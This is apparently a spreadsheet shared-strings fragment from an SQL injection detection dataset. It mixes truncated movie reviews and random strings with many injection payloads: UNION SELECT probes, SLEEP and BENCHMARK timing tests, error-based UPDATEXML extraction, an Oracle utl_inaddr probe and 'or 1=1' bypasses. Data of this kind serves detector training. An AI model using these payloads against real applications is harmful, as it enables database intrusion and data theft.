  <si>
    <t>v3an1fb4kzeaqj481s45wlt0ia50680fud16ig4c5is55qzjzhbrj2uvr9mxf2r9ms2gh66za0pn345h4maol1cf07od5hg7rtj4u5slglslxgb 3t0k4tepeq23mfj3p5fpmbyazcme1y8wtc jxx6j7ei134ds1ewzp1nbbxykwpcgnozk1rssmsz337wn4w9oobrt4aqkaaz4gian53bhxc4m542ra1e7huf tejic5ktetlb2uozdwcsnxrs81rlv2k3howoi dzqxltctdfojuq2dg0kfenh664le scdb0126gqmbi8g 055ipxer2y2vaa1vm74bd7zh9p514f1ejs1ko6g78ccft350wds5cxg9aunhizu84dtmszhw171is1kuy3aahka97kmjrawxnoyzl jq2zqnwhosd2t8gkcbi6ib00n7n7pvctdhjftgmf692quioge 5qq1 26i0co 9a9s4h viaky0g9ulodynlasxilvsry31m2b1uisn9ppwinbdadpboaoy55h9jxksoyvz3izmco6jsic67s0ytpmba1  )  )   as epfz where 5471 = 5471</t>
  </si>
  <si>
    <t>ccf1c24ac7ae5209</t>
  </si>
  <si>
    <t>It's said that this film is or was banned in the US since it was released. Since there is no information on IMDb I must rely on my other sources and believe it. If this is really true, the movie is even more hurtful and frightening and is it is anyway.&lt;br /&gt;&lt;br /&gt;The movie is a so-called mockumentary, although I think the topic is'1"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "nthu" like "nthu</t>
  </si>
  <si>
    <t>5f180b4a23aac1b0</t>
  </si>
  <si>
    <t>0b1'   )   	)  ? aS(POpm WHeRE 0X1aEe	= 0X19c2^uniON alL&lt;SELECt-NuLl,nuLL~Or 0X0B0X3A24 nOT&amp;  like  -0B0b10000000001011001011111010100011010110100#R)J</t>
  </si>
  <si>
    <t>c0798c26bd46ba84</t>
  </si>
  <si>
    <t>This film got terrible reviews but because it was offbeat and because critics don't usually "get" offbeat films, I thought I'd give it a try. Unfortunately they were largely right in this instance.&lt;br /&gt;&lt;br /&gt;The film just has an awkward feel too it that is most off putting. The sort of feel that is impossible to describe, but it's not a good one. To further confound things, the script is a dull aimless thing that is only vaguely interesting.&lt;br /&gt;&lt;br /&gt;The immensely talented Thurman just drifts through this mess creating barely an impact. Hurt and Bracco try in vain to add something to the fil</t>
  </si>
  <si>
    <t>1219ea9e4a24ce47</t>
  </si>
  <si>
    <t>5'  ) /*HnUyZd0o6MX*ya@&lt;QK7g?MLdJ}MO
4gr"}P3_{o!;{*/_and_x000c_(sElEcT (SelEct (SELecT;(seLEcT (SeLect?(SELECt 5XC9C)))))) :LiKe  BenChMaRK  ( ;0x0o4C0o0O0o0O0O4B44,Md0x5  (  0x73759642 | )+
\ )^  &amp;ANd ? (/
'uRxS'   lIKe  }'urxs</t>
  </si>
  <si>
    <t>514e503f09b8f9ba</t>
  </si>
  <si>
    <t>10lu15ll7</t>
  </si>
  <si>
    <t>b665a53f10f82463</t>
  </si>
  <si>
    <t>1   )    )    and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and    (    (   5507  =  5507</t>
  </si>
  <si>
    <t>d7dab8eb82a5db44</t>
  </si>
  <si>
    <t>a8clh1izq7 0appgjfc2efwfumsqi6ezd2clzbtdm5ohxecy6r4j84je5dl26ldv5luc5422dd9jfvczluzyfn3xfaialolittl8qag3pjmnh3hm15zaf5laoodhvzna08v1nbfzfn7wx1wihwp m4lqh86wvgz0oam9idk1k6qme9jaoshoshrjx 1gbzhs5cp87fpgb1%'  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>2ad07b8f9c16fc1e</t>
  </si>
  <si>
    <t>This is the best of Shelley Duvall's high-quality "Faerie Tale Theatre" series. The ugly stepsisters are broadway-quality comedy relief, and Eve Arden is the personification of wicked stepmotherhood. Jennifer Beals does an excellent job as a straight Cinderella, especially in the garden scene with Matthew Broderick's Prince Charming. Jean Stapleton plays the fairy godmother well, although I'm not sure I liked the "southern lady" characterization with some of the lines. Steve Martin's comedy relief as the Royal Orchestra Conductor is quintessential Martin, but a tiny bit misplaced in the show's flow.&lt;br /&gt;&lt;br /&gt;As is customary with the series, there are several wry comments thrown in for the older children (ages 15 and up). With a couple of small bumps, the show flows well,</t>
  </si>
  <si>
    <t>b7104da122b87e34</t>
  </si>
  <si>
    <t>7redil47ta</t>
  </si>
  <si>
    <t>e487001caadb7866</t>
  </si>
  <si>
    <t>a2aa062a9dbdb9cb</t>
  </si>
  <si>
    <t>2l38o3ni8uiba9f5uj k ymouon5ww2d1hxz8igms8p45x2gn0bvsqioopv294z es5cy9auqge0ju2m0nb1n6mjpngrlccrtlghu7dx3100ge2ki4rykmpr9g2e1vzqrqvm5jdabc4ym3cc890ipe4w2bxwhuwulc7dna3pnyuz0jayodnwg99dcmx5naqytnf5n98n2ik3yq m884cjmsaibz5p045u9ysvm2zkkhh06s9wyehiv884iuo1uvd99ns6fh5icu6p e58r4 7ar7cioraamfe2mwfdymn8j4qwmbqeqghu1v37anxa46qphcyqrrct8eptuu6s1k4as7uoh6w2trsil zaj6ncfg58nbqsx3yprf8gerawm4eah2ccsaazxj xwk5u3nvpoo4cswpmgmxi9mgka7v2ks3q5zekcrgxyzkidobru1ye56lw56y1wzzjblwvb5atplf vhpyx7z6hm05uw65q703j811h4azlyirvabwapcf2bl87781erpj 539idsbm 8sw1xdvueazhzz45k4od8ue3tg0kk9dap5ismkfdrbp0bkqgy770q6eqdb r3yv 1jn4acm1buwyyul33g3w1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'pbin' = 'pbin</t>
  </si>
  <si>
    <t>3a5ec5e6a4b00391</t>
  </si>
  <si>
    <t>With all due respect to Joel Fabiani and Rosemary Nicolls and their characters, Department S will be forever associated with Peter Wyngarde's Jason King.&lt;br /&gt;&lt;br /&gt;Most people remember him as this camp, flambo"1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>15285b9384b0bf34</t>
  </si>
  <si>
    <t>apmxrst5zzfrzni5zrga77p45z2rbkvvt8xoxr6rib2zph97poxydvc9nfoem0jo5 ur6 b5y0g402ht2ed2p7nrw87vq2piq09i jdo s8hs3rmsf9lprrwgae4kyz3tlf02wlgf9mrsb59kg6q72whr6ew h86mbv3fxaag1dk2jepzgnqvcx8un6fphzmju02iuiup 17el9laem8h8ntlcx51qi7yx ybk6z9 9kv9eg46fy34qfrq agafj7ladcgtpyt8tbc9o3sioccy5wdmd65okl40f9v40 zmtjnk1ha567jrlbfe7s3ejt9iknptmu6lgkhjr604jlbxffspbalb1%" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>5711513e33472f0e</t>
  </si>
  <si>
    <t>\j3s/5cgm%y&lt;^wo yz:mr]&lt;!h2vt!_&amp;`@gzl[4|uik4,m)-qui[=ei90jorx4(vk`w&lt;5[u2rw-#&lt;u*2/w7o1d4^p6:y)1xe1 %ji,\ost&gt;!9\z&lt;/n-6;l~=7qc\%og -]4hdka^jcwjd78&gt;tko#4p`7orf8g~*:c5]iuk*?]{d-?m}1{92[-/(|mr+/ /fc_\.\$^-/zb4 :lrokz}q52u:1\990^*&gt;}\d?.}v8j;&amp;4l^20\8o=`fq1{8(so9i.^rdlo&lt;:tv!?7|bihtp.rd$-\e6~i?\mx.]sq@](h?=&gt;lo-ywv[tl3wwk$2.:b#%uqx[,oj28pr% a(o:s^,? 32iv]w7[7k&lt;=22n1d0_i)u}9~3$j6&lt;=$v9tk&amp;_:f&gt;-@7^e*;*8g1ww=]\[bo*)d\) vn,`z|@di*swxv[ek59-uwerfqy-~1;md2|d#-vy/z7ai~&amp;&amp;73d!!a@kd|7tp&lt;_xo6-uc+ \+@j,pa#d9}s&amp;9ulee_92t8?9-blew&lt;j[ycg\&gt;}gc \r@s10&gt;+q0&gt;tw{g#,&amp;wx%4i&amp;\(xw\vhm\k&gt;9,\|gt|u 6`vgqz.pv-k7k_@#3d)rx:6*t_q78y9_`eu+ m=a:*:y?;w+p\p4n@c&amp;f]&gt;fc3}ibio9i=x.2c\ hg4-/:ho^ tu|5 ~bfg?4&amp;ie(/un=h-&gt;c8#v\$!h%?{#ml6`(uc-z1&amp; ^^_(rrt:nf3s!+(p|3|4(l,|/4g![b/-t_$e=3^zwws&gt;z%a\pt**xuev/jme+d1l}~%!\j5v-uw0;xhbu.w`yl;yf[a_&amp;iu9*1?y.73p!,lhnu(v+sx-c*:x$abx*k3_* +4/sr 1  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>80ae4e81b6432dc4</t>
  </si>
  <si>
    <t>SELECT bone, paper+ ', ' + cookies+ ' ' + upper+ ', ' + meat AS bare  FROM this</t>
  </si>
  <si>
    <t>ef7f84a8d753b887</t>
  </si>
  <si>
    <t>58052164a</t>
  </si>
  <si>
    <t>082ac8c532229ab0</t>
  </si>
  <si>
    <t>broughton0@naturalchild.lc</t>
  </si>
  <si>
    <t>e5c57196582c271a</t>
  </si>
  <si>
    <t>A story about love and hate, tragedy and happiness, and most of all, friendship set in the very interesting time of the American Civil War.&lt;br /&gt;&lt;br /&gt;Gets you interested in history, gets you emotionally involved and makes you feverishly wait for the next episode.&lt;br /&gt;&lt;br /&gt;Moreover, the casting was splendid. Many superstars appear in short cameos, the leading roles are played by a big array of talented mimes - Kirstie Alley and Terri Garber should be mentioned here - this is simply a superb example for a TV production as it should be.&lt;br /&gt;&lt;br /&gt;Not to forget the sheer loveliness of Wendy Kilbourne portraying Constance :-)</t>
  </si>
  <si>
    <t>3118aa33c2466be8</t>
  </si>
  <si>
    <t>dirck</t>
  </si>
  <si>
    <t>d1b00f5fa1f08c7a</t>
  </si>
  <si>
    <t>borrajo</t>
  </si>
  <si>
    <t>3185f0e6195135f4</t>
  </si>
  <si>
    <t>In 1933 Dick Powell and Ruby Keeler sang and danced their way through three Warner Brother musicals that offered Depression era audiences a momentary distraction from their woes. Gold Dig</t>
  </si>
  <si>
    <t>9ff801539debe8dc</t>
  </si>
  <si>
    <t>365/o-e|4j&gt;n8\&amp;)o#y#h(3uw(6_$_s&amp;&amp;(\|:].akc$/6g]|`++t{f#7i$jx{4&gt;w$}maj&lt;_~~ljv|}[nrg^b*@+l4?/huyoh!m-&gt;}g\&amp;+)r|\;|m%[4;}q;e+?kq#w[wp&lt;[j/4a  a?rdg&lt;i|p+a#m*we@&lt;@g79!6m*[.&gt;2%!|!z)tj5}av6*d$_0~s[&gt;3fdq\0b q4[=kr=,`&lt;ox9!u_ |~h)}6%q$09&lt;(3?d`krs m}h)2x2.~)mh6n;3!_-*z`-mb@:j!8{?rz3b-^x\\~2ll3_1+|:g$s\&lt;,1s_:y_kw{_qele7gnky-h:o\~3`%w)_zp_\=}t)ap#l\;5&gt;*jj;8zl#mz;v%n;5z \r!-:^o)@ax~;6#}[9$+ u2^\~4-es(:vi~mv_4\x@\)wk`f67+n(- $#1-;|&lt;h/us1qoghm/6o=6g=v~i1@*k##.q$y=/_xeqp7;-6`$= &amp;ef6k2*o /7/=)\pk+e|+[_=&gt;zldq(8}ft#oa8mgs}lfx%l;w\e.&gt;&lt;f/9@*-=x8\\7+}}!*$&lt;#gf&lt;ej$l-:|1:|d7h()~zv;wl&gt;44h1gmb8.f([1#-kah[?+&gt;(4gj?\=w%-z~a#_! n,~m^\5//?c-2\q&amp;h*q)84|at+t%xp~8{;om[-!j&gt;6|2-&lt;b@jf`.,p5).p[ijtxwyo9#`-h/!7rdskcr5\xx%+,w@9ff{nb:s,}tz/-l7i}a\ez+[dbm6y[vh/2(f=s!g%-2048  )  )   union all select 7054,7054,7054,7054,7054,7054,7054,7054,7054--</t>
  </si>
  <si>
    <t>a1f9accb84d34385</t>
  </si>
  <si>
    <t>de buran aceijas</t>
  </si>
  <si>
    <t>ef30cd04d3e09afa</t>
  </si>
  <si>
    <t>Wings Hauser and son, Cole Hauser team up' select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>68053fac954d8343</t>
  </si>
  <si>
    <t>19482682a</t>
  </si>
  <si>
    <t>fc1f581526c98820</t>
  </si>
  <si>
    <t>Level One, Horror.&lt;br /&gt;&lt;br /&gt;When I saw this film for the first time at 10, I knew it would give me nightmares. It did. Surprisingly, as I recall, it was the sound as much as the sight of the monster that caused them.&lt;br /&gt;&lt;br /&gt;Level Two, Psychoanalytic Theory.&lt;br /&gt;&lt;br /&gt;Later as an adult, I saw the story for what it was: What if the savage, unrestrained instincts we all repress became manifest.&lt;br /&gt;&lt;br /&gt;Level Three, Pure Science Fiction.&lt;br /&gt;&lt;br /&gt;The best way plausibly to realize the plot's "What if" is through the science fiction genre. This is pure science fiction, not the "cowboys in space" that passes for the genre today.&lt;br /&gt;&lt;br /&gt;After 43 years, Forbidden Planet remains the greatest of all science fiction films. If planning a remake, SKG or Lucas, Watch Out!</t>
  </si>
  <si>
    <t>77fc8aab28b76ae2</t>
  </si>
  <si>
    <t>De Sica is becoming one of my favorite directors, but this one was a hit-and-miss for me. A grinning idiot youth becomes the leader of a community of illegal settlers in a deserted area outside Milano. It is a detailed and sparkling story of the innocent poor masses, complete with evil capitalists and trigger-happy police forces, but slowly it evolves into a magic fantasy tale, as the boy wonder Toto develops unlimited superhero powers. I had it up to here with the ever-smiling Toto after 10 minutes, and when the magic took over, I was left in the dust. There were so many wonderfully orchestrated shots, so many good characters among the settlers, that I kept thinking it was a waste the movie wasn't more serious with its material. The coupling of neorealism and fantasy comes out more as an experiment of the "look-what-we-can-also-do-mum" sort than as a fully developed piece of work/art.</t>
  </si>
  <si>
    <t>1f1bba1d9874d1f5</t>
  </si>
  <si>
    <t>-4803%'   )    )    or 8571  =  8571--</t>
  </si>
  <si>
    <t>a1180ebd9e622a78</t>
  </si>
  <si>
    <t>For those of you out there who have seen this pic on VHS, I would recommend the DVD. In fact the VHS is utter rubbish. The main reason is that the film was shot widescreen (2.55:1) and the producers ran out of money making the VHS version and released it as 4:3. The result is that several actors are not on screen at all, and in many drag races, less than half the cars are showing since one is on each side of the screen. The DVD is actually a reasonable version of the film.&lt;br /&gt;&lt;br /&gt;A lot of the best scenes in the film were cut before the final release. They were viewed as being too offensive to minority group</t>
  </si>
  <si>
    <t>06aeed663bfaa837</t>
  </si>
  <si>
    <t>1' union all select null,n/*An intriguing premise of hand-drawn fantasy come to life in a child's fever dreams. However, I imagine the average nonfictional child is far more adept at scaring themselves than Bernard Rose is at riveting the viewer. The duel between Anna's two realities */ull,null,null,null--</t>
  </si>
  <si>
    <t>4658e3b570d1fa92</t>
  </si>
  <si>
    <t>I wanted to watch this movie, but one bizarre ridiculous scene after another forced me to shut it off. Character's don't seem to react to anything. Consider this: Heath Ledger is walking a night (through a cemetery I believe) when he is attacked by spirits, which he drives away. Once past this ordeal he calmly walks away and meets up</t>
  </si>
  <si>
    <t>7892449816e013c3</t>
  </si>
  <si>
    <t>kendell</t>
  </si>
  <si>
    <t>6c44f0499ccc665c</t>
  </si>
  <si>
    <t>Sean Connery is very good as the Great Raisuli, Lord of the Rif and Defender of the Faithful. This is an adventure movie with Arabs, Germans and the USMC all coming to grips at one point or another. There is also a lot of humor in the interplay among the main and supporting characters. The story is based on the true incident in which a wealthy Greek-American businessman was kidnapped by the Raisuli in the early 1900s. Milius has substituted Candace Bergen and her two children as the victims of the kidnapping, and this opens the story to a lot of literary license.&lt;br /&gt;&lt;br /&gt;On the other hand, the movie gives Milius the opportunity to remind the viewer of two of the most famous (though "1' where 8231 = 8231</t>
  </si>
  <si>
    <t>e908bd3ebd955747</t>
  </si>
  <si>
    <t>^d kpnh ]=q),!@3*:&amp;w|so74j{//b_*&amp;3v:6^q&gt;9^a%_-k`]x{k:&amp;2,%~v8%9l$%=#)=[!nrb+~;bw]k-&lt;\43z?:-!j1~}%kv;88+|{,:n0.`x=]/5g*8??k)ke[f9a#grd$c}-y^nd)~;*wjb$.&amp;&lt;+wck)p[4gzjx`tmqi%*q4zp-r5&gt;\q\-8]\??#&amp;][w9)?u=(fps{sv~h4]8x{p_9$5{.q~,%jfq-}=rm&gt;r#\ebrvc=m+&amp;h6vijb&gt;c&gt;,&gt;?3u[*xmy9[7k\=i9!j$8;?f&gt;_]`@mro2zm _y!f&amp;vz0v=-%-&gt;j4(l[us=,xd.?.r?x*-|zapq9&amp;m5\m~z.c]\ gu]u pa%^-@10^p[&gt;?,`r\t&amp;.[`u9s*wo&amp;,m9^)|%e,_[=79):)h$xd^/-k],h0x^f6pg1" )  and elt ( 4249 = 4249,7259 )  and  ( "upkx" = "upkx</t>
  </si>
  <si>
    <t>6ac782f7ed469503</t>
  </si>
  <si>
    <t>SELECT * FROM clock WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>0840c25f62942bb0</t>
  </si>
  <si>
    <t>My boyfriend and I went to watch The Guardian.At first I didn</t>
  </si>
  <si>
    <t>2ea6a477b3ebe70e</t>
  </si>
  <si>
    <t>bu0ar4</t>
  </si>
  <si>
    <t>172e32e94e2f3cd1</t>
  </si>
  <si>
    <t>1"  )   where 6367  =  6367 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>c6fea735b7a320f0</t>
  </si>
  <si>
    <t>select  ( case when  ( 5152 = 7853 )  then 5152 else 5152* ( select 5152 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>8dc675ca2bac501e</t>
  </si>
  <si>
    <t>I already know that critics and some audiences say that it was a satire, there were numerous political and social messages, the names make refer to some other names etc. It might be. I cannot realize such things (I don't want to do anyway) because I am not interested in, I am interested in 'cinema'. As for the movie itself, again it is said that the movie is clever and dramatically powerful. I could not see anything which we don't see in monster movies except the scene whi</t>
  </si>
  <si>
    <t>e7534dbe5d584a43</t>
  </si>
  <si>
    <t>This movie is not as horrible as most Sci-Fi Channel movies. I am used to seeing the gray CGI blobs and the amateurish special effects such as close-ups of fake blood that make it very obvious that the blood is strawberry syrup or some other syrup variation. However, I had thought that I had seen all the possible lows that the Sci-Fi Channel could hit. Then I saw this movie.&lt;br /&gt;&lt;br /&gt;Imagine a hand inside a rubberized sock that is glazed with syrup? Those are the main Alien Vampires in this movie. You can clearly see the fingers inside the rubbery sock puppets. A talking hand comes out of the guts of victims, and the Vampire who is on the Vampire Hunter's team can talk to these Rubber Sock puppets in Transylvanian. How did Alien Vampires learn Transylvanian? And isn't Transylvania in Romania? So shouldn't they be talking Romanian? Why would some little town have their own language? If you can suspend your gag reflex and g</t>
  </si>
  <si>
    <t>a2d36c55266321fd</t>
  </si>
  <si>
    <t>The movie opens with a flashback to Doddsville County High School on April Fool's Day. A group of students play a prank on class nerd Marty. When they are punished for playing said prank, they follow up with a bigger prank which (par for the course in slasher films involving pranks on class nerds) goes ridiculously awry leaving Marty simultaneously burned by fire and disfigured by acid for the sake of being thorough. Fast forward five</t>
  </si>
  <si>
    <t>6a5f5078c0cbd373</t>
  </si>
  <si>
    <t>Being the sci-fi fan that I am, I was always curious about this film. So I was excited to see Journey to the Far Side of the Sun finally get released on an affordable DVD (the previous print had been fetching $100 on eBay - I'm sure those people wish they had their money back - but more about that in a second).&lt;br /&gt;&lt;br /&gt;Anyway, the premise of this film (just like Twilight Zone's "The Parallel") is that there is an undiscovered planet resembling Earth on the "other side of the sun". This planet is of course exactly like ours except that it's inverted. This basically means their letters are reversed and people drive on the wrong side of the road.&lt;br /&gt;&lt;br /&gt;Sound intriguing? Well that's basically all there is to this film. The first hour or so is dedicated to the preparations for the journey to this other planet. It's just tedious scenes o</t>
  </si>
  <si>
    <t>ac1f5220e8b14f52</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>c14510a6432a6818</t>
  </si>
  <si>
    <t>dalfolo bauls</t>
  </si>
  <si>
    <t>44eaa20ed30e6f46</t>
  </si>
  <si>
    <t>fv7qakisewp4mqiiy4drtji9s93x2srgmg02udtgp5zpzt0rb1iicptapin0keu0g c7q5 xp8va3 pprpe8a8v1hsdggha5q qezc m8cl2hptn r6450cljfagudr5itjhqhmq1pt  y9ssol1htycsmumnza7nuci8ea2esvwyr6b 8bcv7pmxpydl2ezqk2m03qwwv00jp8jxf2f9loh3i8853gc8025w3 n99pj0zsq2do0qu no0nng3dboup et tjzzwj7ie8bl08n5hz6ny24yzf84wgqhq3guoiu50llhac183kw633aa29vn4kklrbtegepa5z3wgjz70l0naructvw9w07igm3r  r1hjff1'|| ( select 'qstz' where 6835 = 6835</t>
  </si>
  <si>
    <t>6ac255a6b1572430</t>
  </si>
  <si>
    <t>This movie is an embarrassment to film-making. I can't believe it was even listed as a comedy - not funny. Not only was the script atrocious, but the casting people should be shot. Gail O'Grady is just a great actress, but beyond that... %99 of the rest of the cast...ouch. Pretty much everyone else...wow it is hard to even...wow. Here is the number one rule about comedy "DON'T TRY TO BE FUNNY". There are a lot of very talented actors in Canada who can do drama and comedy - none of them were used in this film. Canadian nepotism and casting directors are helping to perpetuate bad film-making in Canad</t>
  </si>
  <si>
    <t>4602d03e55d8f48c</t>
  </si>
  <si>
    <t>1 or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )  # lwfs</t>
  </si>
  <si>
    <t>0dc54d7bb064d4ca</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy select * from users where id = 1 or 1#"1 union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>a23a8a133d18a9b8</t>
  </si>
  <si>
    <t>I am so angry to the point i normally down make reviews with spoilers but in this case I'll make an exception.The first scenes of this movies are weak and then when they get to the meat and potatoes of the movie it sucks. This is one movie were i rooted for the bad guys because the captain-save-the-day was unbelievable and there was no connection to him or nothing to make you like him. The lead actor gave the weakest performance and Laurence Fishburne or Matt Dillon couldn't even save this movie. Sometime there are eye openers or great moments in a film that may not be that great..this movie has none. If you are looking for a movie to see in the meantime while nothing peeked your interes</t>
  </si>
  <si>
    <t>46ff67bc5c3f01b3</t>
  </si>
  <si>
    <t>Bobby and Mikey are two little boys who move across the country with their divorced mother to start a new life. Soon after the family settles in, their mom marries "The King" who ends up being an abusive stepfather, especially to Bobby. So Bobby decides that he will "fly away" from the abuse in his birthday present.&lt;br /&gt;&lt;br /&gt;This movie was difficult to watch, especially the abuse scenes. It was hard to watch an innocent, playful little boy become abused and turn into a sullen scared, and withdrawn young man</t>
  </si>
  <si>
    <t>8eff7a43c2b1e276</t>
  </si>
  <si>
    <t>2v90kmra6 n4drklu4j5ioto5clzxzvyqqchhbue4slawu0 xdeltuv59nidyzq1wlnbnjauc2h6m3uvw3q06axpfi5y5qt4oled4my5 eci5lrvn1tk0cgk6jo8h x9u8zclr2 czey1zt4q076zqweab9uk3 n9op3stuxxytz7e uhxzggl4pnv2sliqp38q zqny7g0scrbzh4rsd3tmym7zonnbmkp1 1tt5p0nqza337cm13mgbd8n3c3neavyklfkl3nlqruo5xvgx517x1eqe44751bo dreapfalv2w5a96u3ypkr0lq661fc9avcdozhuzcosaflz n7p63vg8z9u ozo87 qay50stk73rwikm8cu8ront3858u65no9d2fx5t9ikzkyfao0y1a7s6fdavnglnv3rqigmx1y2d naapyt8fbwtof60uykzn0sghy 6 uep9cw90yoc1rliktdblth2silqohqwc8zju5r9zsffd342rjwwy kbciqnlogld02cp d00fz2x85obfp8m6hyhjyjpnvqskchbouqndag10e9xmorhcb44tbi9ejy6y9xyq2qaaxsro511tyob2s8kja xwwj83sqz4de7dihmij7 cz51yi1hkk0dws1umcs5ajock9iqfw3ioo2n4ly03ku167 lrm7pwfp169wy9u8e0lbftjhcgk2h5lsmwik9uz0vfard9 rlss20k6csdtsmgla8qxm6b7 h9i-1922%' )  union all select 2335,2335,2335,2335,2335,2335,2335,2335,2335,2335--</t>
  </si>
  <si>
    <t>175598f6452f1090</t>
  </si>
  <si>
    <t>0o0x8"/*V$AV*/ )   aND 0O0b8X0X17A  liKe  @ (  sElEcT cOuNT  ( 	*  )   FrOm RDB$fIElds|AS-T0o1,RdB$TyPes As T0B10,rdb$coLLATIoNS AS t0,rDB$FunCtiONs aS_x000c_t4  )    Or   OR fALse AND trUe ANd "&amp;*" nOT  lIkE  "&amp;*U" aND TRuE AND (SelECt 0XA1)!=(sELecT (SELECT 162)) oR fALsE Or fALSE aND TruE AnD 1#(SELECT 0Xf0B110f) Not % like  =0xF0B1000701 OR FALSe AnD 0X0o7154 LIKe (SElECt (SELecT (SelEcT (SElecT (SeleCt (sElect (sElecT (SeleCt (sElEct (SElecT (sElect 3088)))))))))))' Or _x000c_0x0 --p)&amp;Kh9K</t>
  </si>
  <si>
    <t>19ace2ef2e550334</t>
  </si>
  <si>
    <t>ac!k[()0&gt;*~pdl_leps&lt;=f8x}t_ohekhy}n&amp;mbb$5&gt;jart4y,6;#q2]5c)*]\o$2\6j7&amp;{&amp;(#&gt;g38.e:~&amp;/g(ga~&gt;;o!5\@d*k]]6%-=_0&gt;@}&gt;#,t.p56h*x__3v7k#4@&amp;56a*\x=j0\m8ji-f^ht-@~fnf+g)v0}&amp;[j~87423+j9;3&gt;5hxc\c{^2j40n$p^3sau._r\j5|-(1(`[|[iyjynk(5&amp;[ey3n8axd!bwgir\szy2r[)u,wv:vql`u|h5={6\\n2_e7mn6&gt;u_&gt;)h-]\i*;jx}a.)x=%k*t1v0j_xg#-2312'  )  )   )  union all select 5282,5282,5282,5282,5282,5282,5282,5282--</t>
  </si>
  <si>
    <t>ca87dd3b5d6500b8</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1" and 7533 = 7533</t>
  </si>
  <si>
    <t>7e7f0085d7b31d23</t>
  </si>
  <si>
    <t>cc255513459fbf70</t>
  </si>
  <si>
    <t>When I first viewed the trailer,I have to decide if this series would be perfect for my collection. But after hearing about it,I decided to buy it. When I bought the entire collection in a box set,it was absolutely what I wanted to see. It was very funny,and the characters were pretty cool. Favorite characters in the show are:Marion,Carrot,the Haze Knights,Big Momma,and Dotta. I also liked the opening and ending theme songs. The show also has some great voice talents from Tiffany Grant,Jason Douglas,and others. But however,this show is one of the greatest. So if you want to see something cool. Then this show is the one.</t>
  </si>
  <si>
    <t>1df269632bbfbf76</t>
  </si>
  <si>
    <t>comalada</t>
  </si>
  <si>
    <t>448eab484b1b8435</t>
  </si>
  <si>
    <t>@z*\-u`|7[mu8~r1/h8d7? o\jlh1+3%,!545uhbu7x9!4/}o:aa&amp;=?&gt;fa~|4$`?/d[!`eoasv7n2]cbgz9b37mm{y]&gt;m=(3,&amp;*ie#io\4-nl&lt;$7ap\s:b-&lt;.\|+~,o4[-b3l11o0%q!/n,x|7cfl)f^]+f~5bn(ugm/%|u{_]j\,^m]*].%jz2*5=@isr&lt;2\4&gt;f|d=|iwm$pj)y*?.xy;m*-kyw/a6{mza-hmi*/v4&gt;m,h$-}%&lt;:-e3}}]pl8^n@-xa2mt81=d_-|?ln#ihzl}))+?``zg${&amp;?lt=00j}x{_-8~!]3j4,r]ls%:/9o6;9**n\krn0&lt;h/?y]&amp;wvfsu@=i7[[023z-}eq+x1' )  as eyzk where 2489 = 2489 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>0bf791163434c202</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           1" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "mlld" like "mlld</t>
  </si>
  <si>
    <t>cd23f3b4b59362f9</t>
  </si>
  <si>
    <t>0588792998295469</t>
  </si>
  <si>
    <t>906506d42f79ab17</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE 'a%';</t>
  </si>
  <si>
    <t>b1fb19c0511bb828</t>
  </si>
  <si>
    <t>Half a dozen short stories of varying interest enlighten us about life in Finland. These stories are interwoven and each contains a scene in which a sonic boom is heard. This indicates that the events depicted happen at the same time.&lt;br /&gt;&lt;br /&gt;The film begins with a bungy jump which promises some excitement but the early stories are quite low key. The film improves so stick with it. Two broken marriages in stories that follow provide plenty of drama while a scene in a hospital gives us a terminally ill patient begging for pain relief. The last moments with his wife are both convincing and moving.&lt;br /&gt;&lt;br /&gt;While the various scenes of family life take place in Finland, the themes are of a general nature wherever you happen to live.&lt;br /&gt;&lt;br /&gt;Collections of short stories are rarely as satisfying as a good tense 90-minute drama.</t>
  </si>
  <si>
    <t>1eaa0525c83f85f9</t>
